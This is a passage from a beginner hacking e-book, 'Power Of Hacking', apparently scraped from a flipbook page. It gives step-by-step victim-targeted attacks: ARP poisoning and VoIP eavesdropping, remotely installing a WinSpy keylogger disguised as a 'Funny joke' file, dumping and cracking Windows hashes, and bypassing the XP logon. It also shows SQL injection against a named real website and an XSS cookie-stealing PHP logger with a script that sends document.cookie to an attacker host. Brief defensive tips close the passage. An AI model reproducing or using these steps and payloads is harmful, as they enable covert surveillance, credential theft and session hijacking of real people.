all the remaining hosts. 9. In the right column, Ctrl+click the system you want to poison to cap-

Mail:mtahirzahid@yahoo.com

Page 127


Power Of Hacking ture its voice traffic. In my case, I select my VoIP network adapter, but you might consider selecting all your VoIP phones. 10. Click OK to start the ARP poisoning process. This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host’s local TCP/IP stack. 11. Click the VoIP tab and all voice conversations are “automagically” recorded. Here’s the interesting part — the conversations are saved in .wav audio file format, so you simply right-click the recorded conversation you want to test and choose Play, as shown in Figure . Note that conversations being recorded show Recording... in the Status column. The voice quality with Cain and other tools depends on the codec your VoIP devices use. With my equipment, I find the quality is marginal at best. That’s not really a big deal, though, because your goal is to prove there’s a vulnerability — not to listen in on other people’s conversations. There’s also a Linux-based tool called vomit (http://vomit.xtdnet.nl) — short for voice over misconfigured Internet telephones — that you can use to convert VoIP conversations into .wav files. You first need to capture the actual conversation by using tcpdump, but if Linux is your preference, this solution offers basically the same results as Cain, outlined in the preceding steps. If you’re going to work a lot with VoIP, I highly recommend you invest in a good VoIP network analyzer. Check out WildPackets’ OmniPeek — a great allin-one wired and wireless analyzer (www.wildpackets.com/products/ distributed_network_analysis/omnipeek_network_analyzer) — and TamoSoft’s CommView (www.tamos.com/products/commview), which

Mail:mtahirzahid@yahoo.com

Page 128


Power Of Hacking is a great low-priced alternative.

These VoIP vulnerabilities are only the tip of the iceberg. New systems, software, and related protocols continue to emerge, so it pays to remain vigilant, helping to ensure your conversations are “locked down” from those with malicious intent. Web Application Tools:✓ Acunetix Web Vulnerability Scanner (www.acunetix.com) for all-inone security testing, including a port scanner, an HTTP sniffer, and an automated SQL injection tool ✓ Firefox Web Developer (http://chrispederick.com/work/ web-developer) for manual analysis and manipulation of Web pages Web hacking involves much more than just running automated scanning tools. They find around half of the issues, but you have to pick up where they leave off to truly assess the overall Web site and application. This isn’t a fault of Web vulnerability scanners but rather the nature of the beast. Poking and prodding Web sites and applications requires good old-fashioned hacker trickery and your favorite Web browser. Mail:mtahirzahid@yahoo.com

Page 129


Power Of Hacking ✓ HTTrack Website Copier (www.httrack.com) for mirroring a site for offline inspection Mirroring is a method for crawling through (also called spidering) a Web site’s every nook and cranny and downloading publicly accessible pages to your local system. ✓ N-Stalker Web Application Security Scanner (www.nstalker.com/ eng/products/nstealth) for all-in-one security testing, including password cracking and Web server load testing tools ✓ WebInspect (www.spidynamics.com/products/webinspect/ index.html) for all-in-one security testing, including an excellent HTTP proxy and HTTP editor and an automated SQL injection tool You can also use general vulnerability scanners, such as QualysGuard and LANguard, as well as exploit tools, such as Metasploit, when testing Web servers and applications. These tools can be used to find (and exploit) weaknesses at the Web server level that you might not otherwise find with standard Web scanning tools and manual analysis. Google can be beneficial for rooting through Web applications and looking for sensitive information. Although these non–application-specific tools can be beneficial, it’s important to know that they won’t drill down as deep as the tools given in the preceding list. Crawlers A spider program, such as the free HTTrack Website Copier, can crawl your site to look for every publicly accessible file. To use HTTrack, simply load it, give your project a name, tell HTTrack which Web site(s) to mirror, and after a few minutes (depending on the size and complexity of the site), you’ll have everything that’s publicly accessible on the site stored on your local drive in c:\My Web Sites. Figure shows the crawl output of a basic Web site. Mail:mtahirzahid@yahoo.com

Page 130


Power Of Hacking Complicated sites often reveal more information that should not be there, including old data files and even application scripts and source code. During a recent Web security assessment project, I stumbled across a .zip file in a Web server’s download directory. When I tried to open the file, the system asked me for a password. Using my handy dandy Zip password cracking tool (see Chapter 7 for details on password cracking), I had the password in mere milliseconds. Inside the Zip file was an Excel spreadsheet containing sensitive patient healthcare information (names, addresses, Social Security numbers, and more) that anyone and everyone in the world could access. In situations like this, your business might be required to notify everyone involved that their information was unprotected and possibly compromised. It pays to know the laws and regulations affecting your business. Better yet, make sure users aren’t posting sensitive information in the first place!

Look at the output of your crawling program to see what files are available. Regular HTML and PDF files are probably okay because they’re most likely

Mail:mtahirzahid@yahoo.com

Page 131


Power Of Hacking needed for normal Web usage. But it wouldn’t hurt to open each file to make sure it belongs there and doesn’t contain sensitive information you don’t want to share with the world. Unsecured login mechanisms:-

You should also take your login testing to the next level by using a Web login cracking tool, such as Brutus (www.hoobie.net/brutus/index.html), as shown in Figure 14-12. Brutus is a very simple tool that can be used to crack both HTTP and form-based authentication mechanisms by using both dictionary and brute-force attacks. Winspy keylogger: WinSpy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. It includes Remote Install and Real-time Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. Below I will show you the exact method to install a winspy keylogger on a victims computer remotely. Step 1: First of all you need to Download winspy keylogger Step 2:

Mail:mtahirzahid@yahoo.com

Page 132


Power Of Hacking After downloading winspy keylogger run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and

even while uninstalling.

Step 3:

Now, another box will come, explaining you the hot keys(Ctrl + Shift +F12) to start

the Winspy keylogger software. Step 4: Now pressing on the hot keys will take you a login box asking you to enter the username and pasword. Enter the username and password and click ok.

Step 5: On entering the username and password you will be taken to winspy main screen.

Mail:mtahirzahid@yahoo.com

Page 133


Power Of Hacking Now select Remote at top and click on Remote install.

Step 6: On doing this you will be taken to the Remote install file creator. Enter the following things there: User – Type in the victims name. File Name – Here you need to enter the name of file needs to be sent. Like I have kept the name “Funny joke” which the victim will love to accept. File icon – You really don’t need to change this. Picture – Select the picture you want to insert to the remote file. Email log to – In this field enter your email address which you will use to receive the keystrokes. Hotmail account do not accept remote files so its use a Gmail account

Mail:mtahirzahid@yahoo.com

Page 134


Power Of Hacking

instead.

Step 7:

After you have done all the above steps, click on “Create remote file�. Now the remote file will be created, it will look something like this.

Now you just have to sent the victim your remote file via email attachment or by uploading it to a web-hosting site and then sending victim the download link. Once the remote file gets installed into victims computer, you will receive keystrokes on regular basis. Note:Your antivirus may recognize winspy as a virus. So its recommended that you disable your antivirus before installing winspy. Which software keylogger is better Sniperspy or Winspy? I recommend Sniperspy for the following reasons: 1. Sniperspy is Fully compatible with windows vista,but winspy has known compatible issues with Windows vista 2. It has low antivirus detection rate 3. Sniperspy can bypass firewall but Winspy cant. Mail:mtahirzahid@yahoo.com

Page 135


Power Of Hacking 4. Sniperspy is recognized by CNN,BBC,CBS and other popular news network, Hence it is reputed and trustworthy Rainbow Tables Rainbow tables is one of best password cracking methods ever. Rainbow tables work with per-calculated hashes of all passwords available within a certain character space, be that a-z or a-z A-z or a-zA-Z0-9 etc. If the hashes are not salted a complex password could be cracked with rainbow tables. We will talk more about rainbow tables when we come to Windows Password Hacking section. Here are some more password cracking tools for learning purposes: • Can and Abel • John the Ripper • THC Hydra • SolarWinds • RainbowCrack Cracking Windows Passwords:As we know that the Passwords are stored in windows in weak hash form. The first kind of which is called LM Manager Hash ( Lan Manager).If the password is longer than 7 characters they are broken up in 7 – Characters made upper case. And then hashed with DES. This means there are only about 2 37 8-bit hashes instead of 2 83 16bit hashes hence making it easier for the hacker to crack it. The tool which is used to crack windows password is known as OPH Crack and it uses Rainbow tables to crack the password, which was explained in the Password Cracking section. Below are the steps which a hacker might take to crack windows password s using OPH Crack I will be using OPH 2.2 you can use newer version which work in similar manner. 1. First of all you would need hashes to crack windows password. Windows stores Mail:mtahirzahid@yahoo.com

Page 136


Power Of Hacking hashes a) In the folder C:\windows\system32\config. This folder is locked to all accounts (including an Administrator account). b) In a SAM file from C:\windows\repair if rdisk has ever runIn the registry, c) Under HKEY_LOCAL_MACHINESAM, which is locked to all accounts 2. Now you would need a copy of those hashes to begin the cracking process. Here is a method to obtain windows hashes • Boot to linux and copy the file directly from C:\windows\system32\config. • Run pwdump2, including in Ophcrack. Here is an example of the command line (start, run, type “cmd” and hit enter) C:\Documents and Settings\Elliott Back>cd “C:\Program Files\ophcrack\win32_tools” C:\Program Files\ophcrack\win32_tools>pwdump2 Administrator:499:aabbcc:3311dd::: Elliott Back:234:aabbcc:3311dd::: C:\Program Files\ophcrack\win32_tools> 3.Now once you have the hashes you can start the cracking process now.

Mail:mtahirzahid@yahoo.com

Page 137


Power Of Hacking

4.Start OPH CRACK 2.2.

Note:While Installing OPH Crack make sure that you choose to download the table separately 5. Now Click on Load and then Click on PwdDUMP file

Now select either the hashes you got from pwdump2 or from sam hash file

Mail:mtahirzahid@yahoo.com

Page 138


Power Of Hacking

6. Now you would need tables you can get table from the below url http://ophcrack.sourceforge.net/tables.php Note: If you have Ram less than 1GB you should look for a smaller table.

7. Now once you have the table. Go to OPH Crack Click on Tables and type the rainbow hash table you are using, in this case its 5k.

8. Now Click on the launch button and it will First load the tables into the memory

Mail:mtahirzahid@yahoo.com

Page 139


Power Of Hacking and then begin trying passwords.

9.Once the process is completed it will show the Cracked passwords, number of time per hash, hash - redux Calculations and fseek operations. As you can see here that it has found 6/7 passwords, it could not find the password for one of the hash but still our success rate is 86%. Bypassing windows XP Logon Screen This hack will allow you to bypass windows xp or windows 2000 logon screen

without knowing the actual password. Mail:mtahirzahid@yahoo.com

Requirements: Page 140


Power Of Hacking 1. You must have Physical access to the victims computer. I will explain this in the malware section. 2. You must have a CD drive or DVD drive. To bypass windows xp logon screen I will use a tool called DreampackPL. DreamPackPL is a software which allows you to login In into local account without restarting the actual password. DreampackPL disables windows file protection mechanism allowing you to bypass the password validation process. Below are the steps to use DreampackPL to bypass windows xp password. 1. First of all download DreampackPL and the ISO File 2. Burn ISO file to CD with a software such as Ahead Nero 3. Once the boot CD disc is created, restart the PC, and boot from the CD/DVD drive. User will come to Windows 2000 (or Windows XP) Setup screen.

4. Now press R to continue and install Dream pack. 5. Select the Windows installation that is currently on the computer. Select 1 if you

have one window. sure that you backup sfcfiles.dll file by using the following command:

Make

For Windows XP: Mail:mtahirzahid@yahoo.com

Page 141


Power Of Hacking ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld For Windows 2000: ren C:\Winnt\System32\sfcfiles.dll sfcfiles.lld. 6. Copy the patched file from CD to System 32 folder. Lets assume that your CD drive is E then you will type the following command: copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll 7. Now type “Exit”, take out the disk and Reboot. 8. Once Windows display Windows Logon prompt, key in “dreamon” DreamPackPL command (without quotes) in the user name or password field.

9. Now DreamPackPL menu will be displayed. the top graphic on the DreamPackPL and a popup menu will be

displayed. Setting options.

Mail:mtahirzahid@yahoo.com

10. Click on

11. Navigate to Command and click on Command

Page 142


Power Of Hacking 12. Now enable the God-password options by ticking the box.

13. Now exit from DreampackPL and enter god in the username of password option of the logon screen to successfully bypass windows logon screen. ARP Poisoning Attack ARP Stands for Address Resolution Protocol. It is used to map IP addressing to MAC addresses in a local area network segment where hosts of the same subnet reside. In an ARP poisoning attack the hacker places him in between the router and server and steal all kind of passwords. The following diagram will help you to understand the concept behind the ARP

Poisoning attack. exchanged between the user and router and the router will sent

Normally the data is

the information to the server, which will allow you to login. In an ARP Poisoning attack the hacker will place him between the server/Router and the user/Victim and therefore steal your private data. Below I will show you how a hacker can Implement an ARP Poisoning attack and steal your passwords. Mail:mtahirzahid@yahoo.com

Page 143


Power Of Hacking 1. First of all Open Cain and abel.

2. Once you have opened Cain and Abel, go to "Configure" at the top, and select the Adapter that you use to connect to the internet (WiFi card). 3. Now Click on the Sniffer tab and click on Nuclear yellow button just below the

File button.(This will start Sniffing)

blue “+” Sign. host in my subnet” is selected, and then he

Mail:mtahirzahid@yahoo.com

4. Now press the

5. A window will popup, make sure “All

Page 144


Power Of Hacking

will click on OK button

network.

7. This will find all the active computers on your

8. Now goto APR tab at the bottom

9. Press the blue "+" sign again and select the IP of your router, all IPs connected to it will be prompted at the right side column, select the ones you want to intercept.

10. Then just press "OK", now press the yellow nuclear sign to start the ARP

Mail:mtahirzahid@yahoo.com

Page 145


Power Of Hacking

poisoning. Few minutes. After some time go to Password tab at the bottom

11. Now leave it for

to view the passwords you have collected. The passwords may appear in MD5 hash form, but most probably you will get it in simple form. Lets say that the password appears in MD5 hash form 0c4f5f8fd16ab0b20a152fab22c3c11c. Cracking MD5 Hashes Now we can use methods like Brute force, Dictionary attack or Rainbow tables to crack the hash and get the desired Password. Cain and Abel does the job done for you. What you only have to do is to simply enter the hash in Cain and Abel Cracker and it will crack password for you. Here is the method to use Cain and Abel to Crack MD5 hashes. 1. First of All open cain and Abel,Select Cracker button at the top and then select MD5 Hash and then Click the “+� Sign at the Top. Enter the MD5 Hash you want to

Mail:mtahirzahid@yahoo.com

Page 146


Power Of Hacking

Crack and Click ok. Now Right Click the Hash and then select the attack you want to use. I will use

2.

Brute-Force attack to Crack MD5 hash you can also use Rainbow tables or Dictionary attack to Crack. 3 .Adjust Charset and password length. 4. Click Start and it will try passwords until it gets the right one

Usually passwords below 6 or 7 letter get cracked in very short span of time if the password is longer than 7 characters than it can take very long the crack the password. If the password is longer is 7 letters than using rainbow tables is a better option. Packet Sniffing You might have heard not to give out your user-name/password or credit card number when you are on MSN, yahoo or IM Chat, because you would have probably heard that hackers have some ways to steal your your credit card numbers , passwords etc. The method which most of hackers use is called Packet Sniffing. Packet Sniffing is Mail:mtahirzahid@yahoo.com

Page 147


Power Of Hacking defined as the act of capturing packets through a network. The tool which most of hackers use to sniff packets through a network is called Wireshark there are also other tools like windump, Dsniff etc but I will demonstrate packet sniffing through wireshark. 1. Download and Install wireshark and launch it. 2. Now click on the button below File option, This will list available capture

interfaces.

3. Next you need to choose a target, if you are not sure what your target is, wait for few seconds on that accumulates be the larger number of packets is the better choice. 4. Now it will capture the packets and you will be able to see targets msn, yahoo or

Mail:mtahirzahid@yahoo.com

Page 148


Power Of Hacking IM chat conversations.

SQL Injection SQL Injection is the most commonly used method to hack a website. It takes advantage of improper coding of web application. In an SQL Injection attack the hacker attempts to pass SQL Commands through a web application, If the web applications are not coded properly it may result in allowing the hacker to access the database to view the information. Simplest SQL Injection 1. First of all the hacker would look for a site vulnerable to SQL Injection. The hacker will search for the admin page of the target site. 2. Once the hacker reaches the admin login page the hacker will test if the website is vulnerable to SQL Injection or not. 3. Now the hacker will try SQL Commands manually, if the site is vulnerable to this attack the hacker will probably gain access to the database. SQL Injection with SQL Helper Since this book is for beginners and newbies to I wont make it complicated. SQL Helper is tool which is used to perform a SQL Injection attack you do not need any kind of knowledge of SQL to use this software Mail:mtahirzahid@yahoo.com

Page 149


Power Of Hacking 1. First of all download SQL Helper and launch it. 2. Now you need to find a target. You need to find a website with potential vulnerability. You can use some vulnerability scanning softwares scan for vulnerability or try the manual method which I have below. 3. Lets say that the target is http://encycl.anthropology.ru, by entering article.php? id='1 in the url It will give us a syntax error, if you get such error messages, this means the the site is vulnerable to SQL Injection.

4. Now run SQLI helper and insert http://encycl.anthropology.ru/article.php?id='1 in the target field and click inject.

5. The SQLI helper will search for the desired columns.

6. Now Click on “Get Database� button, it will be located just below the inject Mail:mtahirzahid@yahoo.com

Page 150


Power Of Hacking

button. Name column I choose

7. Select any one of the element from the Database

anthropo_encycl and then click on Get Tables, the Get Tables option will be located beside the Get Database option.

8. Now select an element from the table e.g user, work , person_old etc. I choose user

Mail:mtahirzahid@yahoo.com

Page 151


Power Of Hacking

and click on Get Columns. can see that “user” has columns “usr_login” and “usr_pas”, select both of

9. As you

them and click on “Dump Now”.

10. As you can see that the values achieved are in form of hash, hence we need to crack the hashes, either you can use the method I showed you in ARP Poisoning attack or you can just try to crack the hashes through some websites like

Mail:mtahirzahid@yahoo.com

Page 152


Power Of Hacking

md5crack.com

Cross Site Scripting (XSS) Cross site scripting has caused a lot of damage around past years. The major sites like Twitter, yahoo, Facebook etc has also been the victim of this attack. These vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content. Types Xss or cross site scripting can be classified in to two types: 1.Persistent xss 2.Non persistent xss Persistent xss Persistent xss occurs when the data provided by the hacker or attacker is saved in the server. In persistent xss the hackers malicious codes and scripts are rendered Mail:mtahirzahid@yahoo.com

Page 153


Power Of Hacking automatically. In this method the hacker does not even interact it self with web functionality to exploit such a hole. Non Persistent xss Non persistent xss is the most common type of xss. This occur when the information provided by the web client is used by server side scripts to generate a page of results for the user. Searching for the vulnerability Like SQL injection you can use manual method to test or use a vulnerability scanner. To test an xss vulnerability you just need to enter <script>alert("test");</script> in serach form or webform. For example a site www.lapdonline.org is the site the hacker would test for xss vulnerability.The hacker would go to its search bar and enter the html or javascript <script>alert("test");</script>.A popup box will appear like the one below:

This shows that the website has an xss vulnerability. Stealing the cookies The next step which the hacker will take is stealing the cookies and faking it to gain access. Now you must be wondering how the hacker or attacker gets the cookies?, To get cookies the hacker must create an internet page with PHP and ASP. Below is the PHP script which the hacker will use to get a the cookies. <?php $filename = "cookielog.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a'))

Mail:mtahirzahid@yahoo.com

Page 154


Power Of Hacking { echo "Error: Unable to write to the log file"; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Error while writing to log file"; exit; } } echo "Successfully wrote a string to the log file"; fclose($handle); exit; } echo "nothing to write to the log file"; exit; ?> Now open a wordpad and paste the above script and save it as cookielogger.php. Now the hacker will upload it to a webhosting site I suggest you using 110mb.com or ripway.com.

Now you need to test the cookie catcher to find it whether its working or not. Just add http://www.xxxx.com/cookielogger.php?cookie=test , where xxxx is your

Mail:mtahirzahid@yahoo.com

Page 155


Power Of Hacking webhosting site where you have uploaded the cookie file.

When you will visit the the link the string test will be written successfully on the cookielog.txt file, this shows that your Cookie stealer is working. Cookielogger.php is not ready to log text strings and also ready to log cookies I used the Cross Site Scripting exploit to inject a code that will redirect the user to http://www.xxx.com/cookielogger.php with the argument "cookie" filled with the user's cookie. So when the user visits the original site with added code he will be redirected to www.xxxx.com/cookielogger.php?cookie=hiscookie and his cookie information will be saved in cookielog.txt file.Now here is the code which the hacker will insert in the vulnerable site. <SCRIPT>location.href='http://www.xxxx.com/cookielogger.p hp?cookie='+escape(document.cookie)</SCRIPT>

Sending user a file such as www.xxxx.com/cookielogger.php will make him suspicious and he will think twice while going to the site. So the hacker will create another PHP file redirect.php or something like it. what this will do is redirect the victim to the exploit site and catch his/her cookies with out making him suspicious. <?php header("Location: http://Vulnerablesite/?mkt=nlnl'); location.href='http://www.xxxx.com/cookielogger.php? cookie='+escape(document.cookie);escape('"); exit; ?> Vulnerablesite is the site which is exploited to xss and http://www.xxxx.com/cookielogger.php is the url of the cookie logger file which Mail:mtahirzahid@yahoo.com

Page 156


Power Of Hacking you have created previously. Now the hacker will upload the redirect.php file to a webhosting site. Now when the victim clicks on the cookielogger.php link he will be redirected to the original site with exploit added his cookies will be saved in the cookielog.txt file. Once the hacker gets victims cookies he/she will use it to gain access to sensitive data this process is also called session hijacking. The hacker can use cookie stealing tools such as Add N Edit Cookies(Firefox addon) or Proxomitron. Here I am using

Proximitron to demonstrate cookie stealing Proxomitron and just place a “V� before outgoing header filter. We want to

Open

send the users cookie to webserver as its our own cookie. Press the button header and it will create a new header for filtering cookie. Apply the new header now.

Now you just have to configure your browser to use a proxy server. When your browser is set up to use your own proxy server you just have to go to the target url and you will access his/her sensitive data. Types of Malware Malware exists in many types, some of common types of Malware are as follows: Mail:mtahirzahid@yahoo.com

Page 157


Power Of Hacking 1.Trojan horse 2.Worms 3.Backdoors 4.Adware 5.Rootkits 6.Spywares 7.Wabbits 8.URL Injectors etc. Turkojan Turkojan is Remote administration and spying tools for windows operating system. The working is similar to Prorat but it has more functions than Prorat.

Below are some features of the latest version of Turkojan: Reverse Connection Mail:mtahirzahid@yahoo.com

Page 158


Power Of Hacking Remote Desktop(very fast) Webcam Streaming(very fast) Audio Streaming Thumbnail viewer Remote passwords MSN Sniffer Remote Shell Web-Site Blocking Chat with server Send fake messages Advanced file manager Zipping files&folders Find files Change remote screen resolution Mouse manager Information about remote computer Clipboard manager IE options Running Process Service Manager Keyboard Manager Online keylogger Offline keylogger Fun Menu Registry manager Invisible in searching Files/Regedit/Msconfig Small Server (100kb)

Mail:mtahirzahid@yahoo.com

Page 159


Power Of Hacking Download Turkojan from the link below: www.turkojan.com Password Hacking Guessing the password – To avoid password guessing attack do not keep your password such as your date of birth, your fathers name etc. Guessing the Secret answer – Don’t keep your secret answer too simple. For example if your secret question is “What's your Mother's birth place?” Now if the has some information about you he can easily guess it. I recommend you keep the your secret answer as complicated as possible. Social Engineering – Social Engineering attacks are really difficult to avoid, but however there are several methods to avoid it. 1. Never give your password or your personal information to any company representative unless and until your are sure about his/her identity. 2. Employees from companies from like Google , youtube, Hotmail etc will never ask for your password. 3. Never assume that Phone call which appears to come from an organization is original 4. If you are unsure that Email is original verify it by contacting the company. Phishing – Almost 80% of email accounts are hacked by this method the below steps will help you to successfully avoid being victim of Phishing attack. 1. If you are an Internet explorer use I recommend you to use a Phishing filter it will alert you every time you come across a Fake login page or Phisher site. Click here to download phishing filter

Mail:mtahirzahid@yahoo.com

Page 160


Power Of Hacking 2. If you are a firefox user I recommend you using a firefox addon Secure login What secure login does is it automatically skips the fake pages and hence securing you from all kinds of Phishing Attacks. 3. Remember If on a secure page, look for “https” at the beginning of the URL and the padlock icon in the browser. 4. Sites like paypal, Alertpay, Money Bookers will always call you with name instead of “Dear Paypal user”, “Dear Valued customer” or other names like that. Here are a few phrases to look for if you think an e-mail message is a phishing scam 1. Verify or update your account. 2. You have won a lottery. 3. If you don’t respond or update your information your account will be closed in 24 hours. Link Manipulation– To avoid being a victim of a Link manipulation attack always check the url of the page before logging. For example if you are logging into a Facebook account firstly check the url of the phisher site may look like www.facebok.com or www.facebuk.com or something like that. Alternatively you can use Phishing filter or Secure logging to protect your self from a Link manipulation attack. Desktop Phishing – To protect your self from being a victim of Desktop Phishing I recommend you using the a program called Macros. As you know that In desktop Phishing the hackers replace your Windows/System32/drivers/etc/hosts What Macros does is it protects your host files, which prevents the desktop phishing attack. Tabnabbing – The easiest way to avoid a tabnabbing attack is using firefox secure login and

Mail:mtahirzahid@yahoo.com

Page 161


Power Of Hacking Phishing filter. Keylogging – Keylogging is a easy to avoid if you have a good antivirus program installed. However some skilled hackers use some methods like Crypting, Hexing, Filepumping etc to make it hard for antivirus programs to detect it. So Antivirus alone wont protect you from keylogging you need a good antispyware program such as Spyware cease or Noadware. You can also use some antilogging programs such as zemana antilogger. For Firefox users I recommend you using Keyscrambler. Keyscrambler is a unique antilogging program which scrambles your keystrokes so the attacker will get the wrong keystrokes. Website Hacking SQL Injection SQL Injection occurs when your web form accept special characters. The best way to avoid SQL Injection attack is to disallow spaces and special characters. Cross Site Scripting A Cross Site scripting attack can be prevented by following the steps below: 1. Encode output based on input parameters. 2. Filter input parameters for special characters. 3. Filter output based on input parameters for special characters. Remote File Inclusion A Remote File Inclusion attack can be avoided by disabling register_globals and allow_url_open in your sever php.ini file. Local File Inclusion Local File Inclusion attacks can be avoided by good coding practices and also by disallowing any scripts to be uploaded on your server. DDOS Attacks Its truly very difficult to avoid a DDOS attacks web giants like Google , Yahoo and

Mail:mtahirzahid@yahoo.com

Page 162


Power Of Hacking Twitter have also been the victim of this attack. I suggest you to look for some services which could help you fight with this attack. Wireless Hacking ARP Poisoning Attack Arpon (Arp Handler Inspection) is a portable handler daemon which protects that makes ARP secure to avoid ARP Poisoning attacks. You also need to you a strong firewall such as zonealaram and commodo I personally recommend you using commodo firewall because it works best with ARP attacks by default ARP protection is disabled in commodo firewall you need to enable it, to enable it click on Firewall at the top bar and then Click Advanced button at the left pane. Go to Attack Detection Settings

and check “Protect the ARP Cache� Packet Sniffing To prevent packet sniffing attack make sure that the sites important to you use SSL Encryption. If SSL encryption is enabled the url will begin with https:// instead of http://. Mail:mtahirzahid@yahoo.com

Page 163


Power Of Hacking

Mail:mtahirzahid@yahoo.com

Page 164


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.